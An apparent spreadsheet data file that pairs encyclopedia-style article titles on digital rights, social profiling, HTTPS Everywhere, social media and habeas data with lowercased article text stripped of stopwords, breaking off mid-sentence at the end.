  <si>
    <t>La Quadrature du Net</t>
  </si>
  <si>
    <t>quadrature (squaring french) french advocacy group promotes digital rights freedoms citizens. advocates french european legislation respect founding principles internet, notably free circulation knowledge. quadrature engages public-policy debates concerning, instance, freedom speech, copyright, regulation telecommunications online privacy. etymology name group based squaring circle (french: quadrature cercle), unsolvable mathematical problem. according collective, "impossible effectively control flow information digital technology without harming public freedoms damaging economic social development". collective makes analogy squaring circle problem could take ages people realize impossible solve, initially intended. creation structure group founded 2008 free software promoters activists.in 2013, collective re-organized facto association formal (french law) association. this association founded long-time participants helpers initial collective. leadership philippe aigrain, author books information commons, co-founders collective association. jérémie zimmermann, also co-founder collective association, frequently invited television programs interviews, defending raising awareness association's positions opposition many projects consider threaten fundamental liberties internet (french hadopi law, european telecoms package, acta, neutrality, etc. actions quadarature gained notoriety fighting hadopi law, controversial project establish graduated response france. action internet censorship supporting neutrality quadrature work subjects loppsi law, telecoms package acta. 2012 quadrature spokesman co-founder jérémie zimmermann received pioneer award action acta. recognition support quadrature supported advocacy free software groups, including electronic frontier foundation free software foundation. also april (french association) network neutrality bits freedom open rights group references external links english) official website english) quadrature net's wiki quadrature twitter</t>
  </si>
  <si>
    <t>Social profiling</t>
  </si>
  <si>
    <t>social profiling process constructing social media user's profile using social data. general, profiling refers data science process generating person's profile computerized algorithms technology. there various platforms sharing information proliferation growing popular social networks, including limited linkedin, google+, facebook twitter. social profile social data person's social data refers personal data generate either online offline (for information, social data revolution). large amount data, including one's language, location interest, shared social media social network. users join multiple social media platforms profiles across platforms linked using different methods obtain interests, locations, content, friend list. altogether, information used construct person's social profile. meeting user's satisfaction level information collection becoming challenging. this much "noise" generated, affects process information collection explosively increasing online data. social profiling emerging approach overcome challenges faced meeting user's demands introducing concept personalized search keeping consideration user profiles generated using social network data. study reviews classifies research inferring users social profile attributes social media data individual group profiling. existing techniques along utilized data sources, limitations, challenges highlighted. prominent approaches adopted include machine learning, ontology, fuzzy logic. social media data twitter facebook used studies infer social attributes users. literature showed user social attributes, including age, gender, home location, wellness, emotion, opinion, relation, influence still need explored. personalized meta-search engines ever-increasing online content resulted lack proficiency centralized search engine's results. longer satisfy user's demand information. possible solution would increase coverage search results would meta-search engines, approach collects information numerous centralized search engines. problem thus emerges, much data much noise generated collection process. therefore, technique called personalized meta-search engines developed. makes user's profile (largely social profile) filter search results. user's profile combination number things, including limited user's manual selected interests, user's search history", personal social network data. social media profiling according samuel warren louis brandeis (1890), disclosure private information misuse hurt people's feelings cause considerable damage people's lives. social networks provide people access intimate online interactions; therefore, information access control, information transactions, privacy issues, connections relationships social media become important research fields subjects concern public. ricard fogues co-authors state "any privacy mechanism base access control", dictate "how permissions given, elements private, access rules defined, on". current access control social media accounts tend still simplistic: limited diversity category relationships social network accounts. user's relationships others are, platforms, categorized "friend" "non-friend" people leak important information "friends" inside social circle necessarily users consciously want share information section concerned social media profiling profiling information social media accounts achieve. privacy leaks information voluntarily shared online social networks, photos updates life activities (new job, hobbies, etc.). people rest assured different social network accounts different platforms linked long grant permission links. however, according diane gan, information gathered online enables "target subjects identified social networking sites foursquare, instagram, linkedin, facebook google+, personal information leaked".the majority social networking platforms "opt approach" features. users wish protect privacy, user's responsibility check change privacy settings number default option. major social network platforms developed geo-tag functions popular usage. this concerning users experienced profiling hacking; burglars used major social media networks google street-view select victims; astonishing burglars attempted break empty houses people posted status updates geo-locations. facebook formation maintenance social media accounts relationships accounts associated various social outcomes. 2015, many firms, customer relationship management essential partially done facebook. before emergence prevalence social media, customer identification primarily based upon information firm could directly acquire: example, customer's purchasing process voluntary completing survey/loyalty program. however, rise social media greatly reduced approach building customer's profile/model based available data. marketers increasingly seek customer information facebook; include variety information users disclose users partial users facebook: name, gender, date birth, e-mail address, sexual orientation, marital status, interests, hobbies, favorite sports team(s), favorite athlete(s), favorite music, importantly, facebook connections.however, privacy policy design, acquiring true information facebook trivial task. often, facebook users either refuse disclose true information (sometimes using pseudonyms) setting information visible friends, facebook users "like" page also hard identify. online profiling users cluster users, marketers companies access following kinds data: gender, address city user facebook insight page, "liked" certain user, page list pages person "liked" (transaction data), people user follow (even exceeds first 500, usually see) publicly shared data. twitter first launched internet march 2006, twitter platform users connect communicate user characters. like facebook, twitter also crucial tunnel users leak important information, often unconsciously, able accessed collected others. according rachel numer, sample 10.8 million tweets 5,000 users, posted publicly shared information enough reveal user's income range. postdoctoral researcher university pennsylvania, daniel preoţiuc-pietro colleagues able categorize users corresponding income groups. their existing collected data, machine-learning model, generated reliable predictions characteristics income group.the mobile called streamd.in displays live tweets google maps using geo-location details attached tweet, traces user's movement real world. profiling photos social network advent universality social media networks boosted role images visual information dissemination. many types visual information social media transmit messages author, location information personal information. example, user post photo landmarks visible, enable users determine are. study done cristina segalin, dong seon cheng marco cristani, found profiling user posts' photos reveal personal traits personality mood. study, convolutional neural networks (cnns) introduced. builds main characteristics computational aesthetics (emphasizing "computational methods", "human aesthetic point view", "the need focus objective approaches") defined hoenig (hoenig, 2005). this tool extract identify content photos. tags study called rule-based flickr recommendation system", author suggests personalized recommendations, largely based user profiles resources. proven useful many aspects: "web content indexing", "multimedia data retrieval", enterprise searches. delicious flickr zooomr marketing 2011, marketers retailers increasing market presence creating pages social media, post information, people like share enter contests, much more. studies 2011 show average person spends minutes social networking site day. therefore, companies small large ones investing gathering user behavior information, rating, reviews, more. facebook until 2006, communications online content terms amount time people spend online. however, content sharing creating primary online activity general social media users forever changed online marketing. book advanced social media marketing, author gives example york wedding planner might identify audience marketing facebook. some categories include: live united states; live within miles york; older; engaged female. matter choose cost click cost impressions/views "the cost facebook marketplace sponsored stories maximum competition audiences". cost clicks usually $0.5–1.5 each. tools klout klout popular online tool focuses assessing user's social influence social profiling. takes several social media platforms (such facebook, twitter etc.) numerous aspects account generate user's score 1-100. regardless one's number likes post, connections linkedin, social media contains plentiful personal information. klout generates single score indicates person's influence. study called "how much klout have...a test system generated cues source credibility" done chad edwards, klout scores influence people's perceived credibility. klout score becomes popular combined-into-one-score method accessing people's influence, convenient tool biased time. study social media followers influence people's judgments done david westerman illustrates possible bias klout contain. study, participants asked view identical mock twitter pages major independent variable: page followers. result shows pages many fewer followers would decrease credibility, despite similar content. klout score subject bias well.while sometimes used recruitment process, remains controversial. kred kred assigns user influence score, also allows user claim kred profile kred account. through platform, user view influencers engage online community online action impacted influence scores. several suggestions kred giving audience increasing influence are: generous audience, free comfortable sharing content friends tweeting others; join online community; create share meaningful content; track progress online. follower wonk follower wonk specifically targeted towards twitter analytics, helps users understand follower demographics, optimizes activities find activity attracts positive feedback followers. keyhole keyhole hashtag tracking analytics device tracks instagram, twitter facebook hashtag data. service allows track influencer using certain hashtag demographic information hashtag. when enter hashtag website, automatically randomly sample users currently used allows user analyze hashtag interested online activist social profile prevalence internet social media provided online activists platform activism, popular tool. while online activism might stir great controversy trend, people actually participate sacrifice relevant events. becomes interesting topic analyse profile online activists. study done harp co-authors online activist china, latin america united states, majority online activists males latin america china median income $10,000 less, majority online activist female united states median income $30,000 $69,999; education level online activists united states tend postgraduate work/education activists countries lower education levels.a closer examination online shared content shows shared information online include five types: fundraise: three countries, china's activists content fundraise three. post links: latin american activists posting links. promote debate discussion: both latin america's china's activists posts contents promote debate discussion american activists post information announcements news: american activists post content activists countries. communicate journalist: section, china's activists gets lead. social credit score china chinese government hopes establish "social-credit system" aims score "financial creditworthiness citizens", social behavior even political behaviour. this system combining data social profiling technologies. according celia hatton news, everyone china expected enroll national database includes automatically calculates fiscal information, political behavior, social behavior daily life including minor traffic violations single score evaluates citizen's trustworthiness.credibility scores, social influence scores comprehensive evaluations people rare countries. however, china's "social-credit system" remains controversial single score reflection person's every aspect. indeed, "much social-credit system remains unclear". would companies limited credit score system china? although implementation social credit score remains controversial china, chinese government aims fully implement system 2018. according jake laband (the deputy director beijing office us-china business council), credit scores "limit eligibility financing, employment, party membership, well restrict real estate transactions travel." social credit score affected legal criteria, also social criteria, contract breaking. however, great concern privacy companies huge amount data analyzed system. references</t>
  </si>
  <si>
    <t>HTTPS Everywhere</t>
  </si>
  <si>
    <t>https everywhere free open-source browser extension google chrome, microsoft edge, mozilla firefox, opera, brave, vivaldi firefox android, developed collaboratively project electronic frontier foundation (eff). automatically makes websites secure https connection instead http, support option "encrypt sites eligible" makes possible block unblock non-https browser connections click. widespread adoption https internet, integration https-only mode major browsers, extension retired 2022. development https everywhere inspired google's increased https designed force usage https automatically whenever possible. code, part, based noscript's http strict transport security implementation, https everywhere intended simpler noscript's force https functionality requires user manually websites list. provides information users https rulesets https everywhere, information websites support https. platform support public beta https everywhere firefox released 2010, version released 2011. beta chrome released february 2012. 2014, version released android phones. observatory observatory feature https everywhere introduced version 2.0.1 analyzes public certificates determine certificate authorities compromised, user vulnerable man-in-the-middle attacks. 2013, icann security stability advisory committee (ssac) noted data used observatory often treated intermediate authorities different entities, thus inflating number certificate authorities. ssac criticized observatory potentially significantly undercounting internal name certificates, noted used data 2010. continual ruleset updates update version 2018.4.3, shipped april 2018, introduces "continual ruleset updates" function. apply up-to-date https-rules, update function executes rule-matching within hours. website called https-rulesets built purpose. this automated update function disabled add-on settings. prior update- mechanism ruleset-updates app-updates. even feature implemented still bundled rulesets shipped within app-updates. reception studies recommended building https everywhere functionality android browsers. 2012, eric phetteplace described "perhaps best response firesheep-style attacks available platform". 2011, vincent toubiana vincent verdot pointed drawbacks https everywhere add-on, including list services support https needs maintaining, services redirected https even though available https, allowing user extension service. other criticisms users misled believe https everywhere switch site https, https version, could site manager submitted https ruleset eff, extension sends information sites user visits observatory, could used track user. legacy https everywhere initiative inspired opportunistic encryption alternatives 2020: firefox builtin https only mode. 2019: httpz firefox webext supporting browsers. 2017: smart-https (closed-source early since v0.2), also brave open-source browser integrates https everywhere transport layer security (tls) cryptographic protocols provide communications security computer network. privacy badger free browser extension created blocks advertisements tracking cookies. switzerland (software) open-source network monitoring utility developed monitor network traffic. let's encrypt free automated x.509 certificate authority designed simplify setup maintenance encrypted secure websites. http strict transport security security policy mechanism helps protect websites protocol downgrade attacks cookie hijacking. references</t>
  </si>
  <si>
    <t>Social media</t>
  </si>
  <si>
    <t>social media interactive technologies facilitate creation sharing information, ideas, interests, forms expression virtual communities networks. while challenges definition social media arise variety stand-alone built-in social media services currently available, common features: social media interactive internet-based applications. user-generated content—such text posts comments, digital photos videos, data generated online interactions—is lifeblood social media. users create service-specific profiles website designed maintained social media organization. social media helps development online social networks connecting user's profile individuals groups.the term social regard media suggests platforms user-centric enable communal activity. such, social media viewed online facilitators enhancers human networks—webs individuals enhance social connectivity.users usually access social media services web-based apps desktops download services offer social media functionality mobile devices (e.g., smartphones tablets). users engage electronic services, create highly interactive platforms individuals, communities, organizations share, co-create, discuss, participate, modify user-generated self-curated content posted online. additionally, social media used document memories, learn explore things, advertise oneself, form friendships along growth ideas creation blogs, podcasts, videos, gaming sites. this changing relationship humans technology focus emerging field technological self-studies. some popular social media websites, million registered users, include facebook (and associated facebook messenger), tiktok, wechat, instagram, qzone, weibo, twitter, tumblr, baidu tieba, linkedin. depending interpretation, popular platforms sometimes referred social media services include youtube, quora, telegram, whatsapp, signal, line, snapchat, pinterest, viber, reddit, discord, microsoft teams, more. wikis examples collaborative content creation. social media outlets differ traditional media (e.g., print magazines newspapers, radio broadcasting) many ways, including quality, reach, frequency, usability, relevancy, permanence. additionally, social media outlets operate dialogic transmission system, i.e., many sources many receivers, traditional media outlets operate monologic transmission model (i.e., source many receivers). instance, newspaper delivered many subscribers, radio station broadcasts programs entire city.since dramatic expansion internet, digital media digital rhetoric used represent identify culture. studying rhetoric exists digital environment become crucial process many scholars. observers noted wide range positive negative impacts comes social media. social media help improve individual's sense connectedness real online communities effective communication marketing) tool corporations, entrepreneurs, non-profit organizations, advocacy groups, political parties, governments. observers also seen rise social movements using social media tool communicating organizing times political unrest. history social media early computing plato system launched 1960, developed university illinois subsequently commercially marketed control data corporation. offered early forms social media features 1973-era innovations notes, plato's message-forum application; term-talk, instant-messaging feature; talkomatic, perhaps first online chat room; news report, crowdsourced online newspaper, blog access lists, enabling owner note file application limit access certain users, example, friends, classmates, co-workers. arpanet, first came online 1967, late 1970s developed rich cultural exchange non-government/business ideas communication, evidenced network etiquette 'netiquette') described 1982 handbook computing mit's artificial intelligence laboratory. arpanet evolved internet following publication first transmission control protocol (tcp) specification, (specification internet transmission control program), written vint cerf, yogen dalal, carl sunshine 1974. this became foundation usenet, conceived truscott ellis 1979 university north carolina chapel hill duke university, established 1980. precursor electronic bulletin board system (bbs), known community memory, appeared 1973. true electronic bbss arrived computer bulletin board system chicago, first came online february 1978. before long, major cities running trs-80, apple atari, commodore sinclair, similar personal computers. introduced 1981, subsequent models computers used throughout 1980s. multiple modems, followed specialized telecommunication hardware, allowed many users online simultaneously. compuserve, prodigy, three largest companies first migrate internet 1990s. between mid-1980s mid-1990s, bbses numbered tens thousands north america alone. message forums specific structure social media) arose phenomenon throughout 1980s early 1990s. when world wide (www, 'the web') added internet mid-1990s, message forums migrated web, becoming internet forums, primarily cheaper per-person access well ability handle people simultaneously telco modem banks. digital imaging semiconductor image sensor technology facilitated development rise social media. advances metal-oxide-semiconductor (mos) semiconductor device fabrication, reaching smaller micron sub-micron levels 1980s–1990s, development nmos (n-type mos) active-pixel sensor (aps) olympus 1985, complementary (cmos) active-pixel sensor (cmos sensor) nasa's propulsion laboratory (jpl) 1993. cmos sensors enabled mass proliferation digital cameras camera phones, bolstered rise social media. development social-media platforms when berners-lee connected hypertext software internet 1991, developed world wide web, created modern networked communication. weblogs, list servers, e-mail services aided formation online communities support offline groups. online services evolved providing conduits networked communication interactive, two-way vehicles networked sociality introduction 2.0. development social media began simple platforms. geocities earliest social networking services, launched november 1994, followed classmates.com december 1995 sixdegrees.com 1997. unlike instant-messaging clients (e.g., aol's aim) chat clients (e.g., irc, ichat, chat television), sixdegrees first online business created real people, using real names. such, according news, sixdegrees "widely considered first social networking site," included "profiles, friends lists, school affiliations" could used registered users. name references "six degrees separation" concept, posits "everyone planet degrees apart everyone else." first website provide users option creating profile.during early 21st century, social media platforms became popular, first emergence friendster myspace, later launch popularization facebook, youtube, tiktok, among others.research 2015 shows world spent online time social networks, thus suggesting popularity social media platforms. speculated increase social media's popularity widespread daily smartphones. many 4.08 billion social media users worldwide found active smartphones october 2020. definition features idea social media defined simply ability bring people together seen broad, would suggest fundamentally different technologies like telegraph telephone also social media. terminology unclear, early researchers referring social media social networks social networking services mid-2000s. recent paper 2015 reviewed prominent literature area identified four common features unique then-current social media services: social media internet-based applications. user-generated content (ugc) lifeblood social media organism. users create service-specific profiles site designed maintained social media organization. social media facilitate development online social networks connecting user's profile individuals groups.in 2019, merriam-webster defined social media "forms electronic communication (such websites social networking microblogging) users create online communities share information, ideas, personal messages, content (such videos)."while variety evolving stand-alone built-in social media services makes challenging define them, marketing social media experts broadly agree social media includes following types: blogs (ex. huffington post, boing boing) business networks (ex. linkedin, xing) collaborative projects (ex. wikipedia, mozilla) enterprise social networks (ex. yammer, socialcast) forums (ex. gaia online, boards) microblogs (ex. twitter, tumblr) photo sharing (ex. flickr, photobucket) products/services review (ex. amazon, elance) social bookmarking (ex. delicious, pinterest) social gaming (ex. mafia wars) social network sites (ex. facebook, google+) video sharing (ex. youtube, vimeo) virtual worlds (ex. second life, twinity) mobile social media mobile social media refers social media mobile devices smartphones tablet computers. mobile social media useful applications mobile marketing creation, exchange, circulation user-generated content assist companies marketing research, communication, relationship development. mobile social media differ others incorporate current location user (location-sensitivity) time delay sending receiving messages. social media promotes users share content others display content order enhance particular brand product. social media allows people creative share interesting ideas followers fans. certain social media applications twitter, facebook, instagram places users share specific political sports content. many reporters journalists produce updates information sports political news. truly give users pertinent necessary information stay date relevant news stories topics. however, downside users advised exercise diligence using social media platforms. according andreas kaplan, mobile social media applications differentiated among four types: space-timers (location time-sensitive): exchange messages relevance mostly specific location specific point time (e.g. facebook places, whatsapp, foursquare) space-locators (only location sensitive): exchange messages relevance specific location, tagged certain place read later others (e.g. yelp, qype, tumblr, fishbrain) quick-timers (only time sensitive): transfer traditional social media mobile apps increase immediacy (e.g. posting twitter status updates facebook) slow-timers (neither location time sensitive): transfer traditional social media applications mobile devices (e.g. watching youtube video reading/editing wikipedia article) elements function viral content some social media sites potential content posted spread virally social networks. term analogy concept viral infections, spread rapidly individual individual. social media context, content websites 'viral' viral') greater likelihood users re-share content posted another user) social network, leading sharing. cases, posts containing popular content fast-breaking news rapidly shared re-shared huge number users. businesses particular interest viral marketing tactics viral campaign achieve widespread advertising coverage (particularly viral reposting makes news) fraction cost traditional marketing campaign, typically uses printed materials, like newspapers, magazines, mailings, billboards, television radio commercials. nonprofit organizations activists similar interests posting content social media sites going viral. many social media sites provide specific functionality help users re-share (also known re-blogging) content, twitter's 'retweet' button, pinterest's 'pin' function, facebook's 'share' option, tumblr's 're-blog' function. re-sharing (or, case, retweeting) especially popular component feature twitter, allowing users keep important events stay connected peers, well contributing various ways throughout social media. when certain posts become popular, start retweeted again, becoming viral. hashtags used tweets, also used take count many people used hashtag. bots bots automated programs operate internet, grown demand, ability automate many communication tasks, leading creation industry providers.chatbots social bots programmed mimic natural human interactions liking, commenting, following, unfollowing social media platforms. companies greater market shares increased audiences, internet bots also developed facilitate social media marketing. with existence social bots chatbots, however, marketing industry also analytical crisis, bots make difficult differentiate human interactions automated interactions. instance, marketing data negatively affected bots, causing "digital cannibalism" social media marketing. additionally, bots violate terms many social media platforms instagram, result profiles taken banned.'cyborgs'—either bot-assisted humans human-assisted bots—are used number different purposes legitimate illegitimate, spreading fake news creating marketing buzz. common legitimate includes using automated programs post social media specific time. cases, often, human writes post content schedules time posting. cases, cyborgs nefarious, e.g., contributing spread fake news misinformation. often accounts blend human activity strategic way, automated account publicly identified, human half cyborg able take could protest account used manually along. many cases, accounts used illegitimate fashion pose real people; particular, number friends followers resemble real person. cyborgs also related sock puppet accounts, human pretends someone else, also include human operating multiple cyborg accounts. social media technology there rapid growth number u.s. patent applications cover technologies related social media, number published growing rapidly past five years. 2020, 5000 published patent applications united states. many 7000 applications currently file including published yet; however, slightly applications issued patents, largely multi-year backlog examination business method patents, i.e., patents outline claim methods business. platform convergence instance technological convergence, various social media platforms different kinds adapted functionality beyond original scope, increasingly overlapping time, albeit usually implemented completely dedicated platforms. examples social site facebook launching integrated video platform 2007, instagram, whose original scope low-resolution photo sharing, introducing ability share quarter-minute 640×640 pixel videos 2013 (later extended minute increased resolution), acting like minimal video platform without video seek bar. instagram later implemented stories (short videos self-destructing hours), concept popularized snapchat, well igtv, seekable videos minutes hour depending account status. stories later adapted dedicated video platform youtube 2018, although access restricted mobile apps, excluding mobile desktop websites.twitter, whose original scope text-based microblogging, later adapted photo sharing functionality (deprecating third-party services twitpic), later video sharing 140-second time limit view counter manual quality selection subtitles like dedicated video platforms, originally available mobile users later implemented website front ends. then media studio feature business users, resembles youtube's creator studio.the discussion platform reddit added integrated image hoster june 2016 reddit users commonly relied external standalone image sharing platform imgur, internal video hoster around year later. july 2020, ability share multiple images single post (image galleries), feature known imgur, implemented. imgur implemented sharing videos seconds 2018, later extended minute.starting 2018, dedicated video platform youtube rolled community feature accessible channel (which usurps previous discussion channel tab), text-only posts, well polls shared. enabled, channels pass subscriber count threshold lowered time. statistics usage membership according statista, estimated that, 2022, around 3.96 billion people using social media around globe; billion 2020. this number expected increase 4.41 billion 2025. most popular social networking services following list popular social networking services based number active users january 2022 statista. usage: before covid-19 pandemic study 2009 suggests individual differences help explain uses social media not: extraversion openness positive relationship social media, emotional stability negative sloping relationship social media. separate study 2015 found people higher social comparison orientation appear social media heavily people social comparison orientation.data common sense media suggested children united states social networking services despite fact many social media sites policies state must least years older join. 2017, common sense media conducted nationally representative survey parents children birth found children used social media sites instagram, snapchat, (now-defunct) musical.ly "often" "sometimes." different nationally representative survey common sense 2019 surveyed young americans ages 8–16 found children ages 8–12 ever social media snapchat, instagram, facebook. survey, american teens ages 16–18 asked started using social media, said started years old. however, median starting social media years old. usage: during covid-19 pandemic amount usage minors social media plays role communication covid-19 pandemic. june 2020, covid-19 pandemic, nationally representative survey cartoon network cyberbullying research center surveyed americans tweens (ages 9–12) found popular overall application past year youtube (67%). general, increased, tweens likely used major social media apps games.) similarly, nationally representative survey common sense media conducted 2020 americans ages 13–18 found youtube also popular social media service (used 18-year-old americans past year). children grow older, utilize certain social media services frequent basis often application youtube consume content. social media certainly increases people grow older become customary thing instagram twitter account. reasons adults while adults already using social media covid-19 pandemic, started using stay socially connected updates pandemic. "social media become popularly seek medical information fascinated general public collect information regarding corona virus pandemics various perspectives. during days, people forced stay home social media connected supported awareness pandemic updates."this also made healthcare workers systems aware social media place people getting health information pandemic:"during covid-19 pandemic, social media accelerated point becoming ubiquitous part modern healthcare systems."though also spread disinformation, indeed, december 2020, "call action: managing infodemic". some healthcare organizations even used hashtags interventions published articles twitter data: "promotion joint usage #pedsicu #covid19 throughout international pediatric critical care community tweets relevant coronavirus disease 2019 pandemic pediatric critical care." however others medical community concerned social media addiction, increasingly important context therefore "source social validation reinforcement" unsure increased social media coping mechanism harmful. timeline social media (1973-2021) organizational level governments governments social media (for example): inform opinions public interact citizens foster citizen participation open government analyze/monitor public opinion activities educate public risks public health. enforcement investigations social media used extensively civil criminal investigations. also used assist searches missing persons. police departments often make official social media accounts engage public, publicize police activity, burnish enforcement's image; conversely, video footage citizen-documented police brutality misconduct sometimes posted social media.in united states u.s. immigration customs enforcement identifies track individuals social media, also apprehended people social media based sting operations. u.s. customs border protection (also known cpb) united states department homeland security social media data influencing factors visa process, continue monitor individuals entered country. officers also documented performing searches electronics social media behavior border, searching citizens non-citizens without first obtaining warrant. government reputation management social media gained momentum among younger generations, governments began using improve image, especially among youth. january 2021, egyptian authorities found using instagram influencers part media ambassadors program. program designed revamp egypt’s image counter press egypt received country's human rights record. saudi arabia united arab emirates participated similar programs. similarly, dubai also extensively relied social media influencers promote tourism. however, restrictive laws dubai always kept influencers within limits offend authorities, criticize city, politics religion. content foreign influencers controlled make sure nothing portrays dubai negative light. businesses businesses social media tools marketing research, communication, sales promotions/discounts, informal employee-learning/organizational development, relationship development/loyalty programs, e-commerce. companies increasingly using social-media monitoring tools monitor, track, analyze online conversations brand products related topics interest. this prove useful public relations management advertising-campaign tracking, allowing analysts measure return investment social media spending, competitor-auditing, public engagement. tools range free, basic applications subscription-based, in-depth tools. often social media become good source information and/or explanation industry trends business embrace change. within financial industry, companies utilize power social media tool analyzing sentiment financial markets. these range marketing financial products, gaining insights market sentiment, future market predictions, tool identify insider trading.to properly take advantage benefits, businesses need guidelines different social media platforms. social media enhance brand process called "building social authority". however, process difficult, foundational concepts social media cannot completely control one's message social media rather simply begin participate "conversation" expecting achieve significant influence conversation. because wide social media consumers employees, companies social media customer-organizational level; intra-organizational level. social media, connecting individuals ties social network increase entrepreneurship innovation, especially individuals lack conventional information channels lower socioeconomic background. social media marketing social media marketing social media platforms websites promote product service also establish connection customers. social media marketing increased growing active user rates social media sites. though numbers exponential. example, 2018 facebook billion users, twitter million active users instagram million users. then 2021 facebook 2.89 billion users twitter million users. similar traditional advertising, social media marketing divided three types: paid media, earned media, owned media. paid social media firm directly buys advertising social media platform. earned social media firms something impresses consumers stakeholders spontaneously post content social media. owned social media firm owns social media channel creates content followers. main uses interact audiences create awareness company organization, main idea creating two-way communication system audience and/or customers interact; e.g., customers provide feedback firm's products. however, since social media allows consumers spread opinions share experiences peer-to-peer fashion, shifted power organization consumers, since messages transparent honest. least appear (more influencers). social media also used directly advertise; placing advert facebook's newsfeed, example, provide exposure brand large number people. social media platforms also enable targeting specific audiences advertising. users social media able like, share, comment advert; turns passive advertising consumers active advertising producers since pass advert's message friends. companies using social media marketing keep different social media platforms stay ongoing trends. since different platforms trends attract different audiences, firms must strategic social media attract right audience. moreover, tone content affect efficacy social media marketing. companies fast food franchise wendy's used humor (such shitposting) advertise products poking competitors mcdonald's burger king. this particular example spawned fanart wendy's mascot circulated widely online, (particularly sites like deviantart) increasing effect marketing campaign. other companies juul used hashtags (such #ejuice #eliquid) promote products.social media personalities, often referred "influencers", internet celebrities employed and/or sponsored marketers promote products online. research shows digital endorsements seem successfully attracting social media users, especially younger consumers grown digital age. 2013, united kingdom advertising standards authority (asa) began advise celebrities sports stars make clear paid tweet product service using hashtag #spon within tweets containing endorsements, federal trade commission issued similar guidelines. practice harnessing social media personalities market promote product service following commonly referred influencer marketing. 2019 cambridge dictionary defines "influencer" person (personality, blogger, journalist, celebrity) ability affect opinions, behaviors, purchases others social media.marketing efforts also take advantage peer effects social media. consumers tend treat content social media differently traditional advertising (such print ads), messages part interactive marketing strategy involving modeling, reinforcement, social interaction mechanisms. 2012 study focused communication described communication peers social media affect purchase intentions: direct impact conformity, indirect impact stressing product engagement. this study indicated social media communication peers product positive relationship product engagement. politics social media range uses political processes activities. social media championed allowing anyone access internet connection become content creator empowering users. role social media democratizing media participation, proponents herald ushering participatory democracy, users able contribute news comments, fall short ideals, given many often follow like-minded individuals, noted philip pond jeff lewis. online-media audience-members largely passive consumers, content creation dominated small number users post comments write content.: online engagement always translate real-world action, howard, busch sheets argued digital divide north america continent's history, culture, geography.younger generations becoming involved politics increase political news posted social media. political campaigns targeting millennials online social-media posts hope increase political engagement. social media influential widespread attention given revolutionary outbreaks middle east north africa 2011. during tunisian revolution 2011, people used facebook organize meetings protests. however, debate persists extent social media facilitated kind political change.social-media footprints candidates political office grown last decade 2016 united states presidential election provided good examples. dounoucos noted twitter candidates unprecedented election cycle. most candidates united states twitter account. public also increased reliance social-media sites political information. european union, social media amplified political messages.militant groups begun social media major organizing recruiting tool. islamic state iraq levant (also known isil, isis, daesh) used social media promote cause. 2014, #alleyesonisis went viral arabic twitter. isis produces online magazine named islamic state report recruit fighters. state-sponsored cyber-groups weaponized social-media platforms attack governments united states, european union, middle east. although phishing attacks email commonly used tactic breach government networks, phishing attacks social media rose 500% 2016.increasing political influence social media several campaigns running political side another. often, foreign-originated social-media campaigns sought influence political opinion another country. example, twitter campaign saudi arabia produced thousands tweets hillary clinton's trending #hillaryemails supporters mohammed salman. also involved riyadh's social-marketing firm, smaat, history running campaigns twitter. politicians social media advantage spread campaign messages influence voters. growing abuse human rights bahrain, activists used social media report acts violence injustice. they publicized brutality government authorities police, detaining, torturing threatening many individuals. hand, bahrain's government using social media track target rights activists individuals critical authorities; government stripped citizenship 1,000 activists punishment. hiring some employers examine applicants' social media profiles part hiring assessment. this issue raises many ethical questions consider employer's right others consider discrimination. many western-european countries already implemented laws restrict regulation social media workplace. states including arkansas, california, colorado, illinois, maryland, michigan, nevada, jersey, mexico, utah, washington, wisconsin passed legislation protects potential employees current employees employers demand provide usernames and/or passwords social media accounts. social media young people caused significant problems applicants active social media enter market. survey 17,000 young people countries 2013 found people aged rejected online comments made social media websites.for potential employees, social media services linkedin shown affect deception resumes. while services affect often deception happens, affect types deception occur. linkedin resumes less deceptive prior work experience deceptive interests hobbies. science social media science communications offers extensive opportunities exchanging scientific information, ideas, opinions publications. scientists social media share scientific knowledge findings platforms researchgate, linkedin, facebook, twitter academia.edu. among common type social media scientists twitter blogs. found twitter increased scientific impact community. social media improved elevated interaction scientists, reporters, general public. over 495,000 opinions shared twitter related science year (between september 2010, august 2011), increase compared past years. science related blogs motivate public interest learning, following, discussing science. blogs textual depth graphical videos provide reader dynamic interact scientific information. both twitter blogs written quickly allow reader interact real time authors. however, popularity social media platforms changes quickly scientists need keep pace changes social media. terms organized uses scientific social media, study context climate change shown climate scientist scientific institutions played minimal role online debate, nongovernmental organizations played larger role. academia signals social media used assess academic publications, well different scientific approaches. another study found health science students acquiring academic materials others social media. school admissions issue workplace issue post-secondary school admissions well. there situations students forced give social media passwords school administrators. there inadequate laws protect student's social media privacy, organizations aclu pushing privacy protection, invasion. they urge students pressured give account information tell administrators contact parent lawyer take matter further. although students, still right keep password-protected information private. according 2007 journal, social media admissions officials united states used standardized test scores, extra-curricular activities, letters recommendation, high school report cards determine whether accept deny applicant. 2010s, colleges universities still used traditional methods evaluate applicants, institutions increasingly accessing applicants' social media profiles learn character activities. according kaplan, inc, corporation provides higher education preparation, 2012 admissions officers used google learn applicant, checking facebook. students whose social media pages include offensive jokes photos, racist homophobic comments, photos depicting applicant engaging illegal drug drunkenness, screened admission processes."one survey july 2017, american association college registrars admissions officers, found pe</t>
  </si>
  <si>
    <t>Habeas data</t>
  </si>
  <si>
    <t>habeas data writ constitutional remedy available certain nations. literal translation latin habeas data “[we command] data”. remedy varies country country, general, designed protect, means individual complaint presented constitutional court, data, image, privacy, honour, information self-determination freedom information person. habeas data sought citizen manual automated data register find information held person. that person request rectification, actualization destruction personal data held. legal nature individual complaint habeas data voluntary jurisdiction, means person whose privacy compromised present courts power initiate process themselves. history habeas data individual complaint filed constitutional court related privacy personal data. first complaint habeas corpus (which roughly translated “[we command] body”). other individual complaints include writ mandamus (usa), amparo (spain, mexico argentina), respondeat superior (taiwan). habeas data writ short history, origins traced certain european legal mechanisms protected individual privacy. particular, certain german constitutional rights identified direct progenitors habeas data right. particular, right information self-determination created german constitutional tribunal interpretation existing rights human dignity personality. this right know type data stored manual automatic databases individual, implies must transparency gathering processing data. direct predecessor habeas data right council europe's 108th convention data protection 1981. purpose convention secure privacy individual regarding automated processing personal data. achieve this, several rights given individual, including right access personal data held automated database.the first country implement habeas data brazil. 1988, brazilian legislature voted introduce constitution, included novel right never seen before: habeas data individual complaint. expressed full constitutional right article lxxii, constitution. following brazilian example, colombia incorporated habeas data right constitution 1991. after that, many countries followed suit adopted legal tool respective constitutions: paraguay 1992, peru 1993, argentina 1994, ecuador 1996. between 1999 2012, several latin american countries enacted data protection laws procedure file habeas data writ regulated. implementation brazil: 1988 brazilian constitution 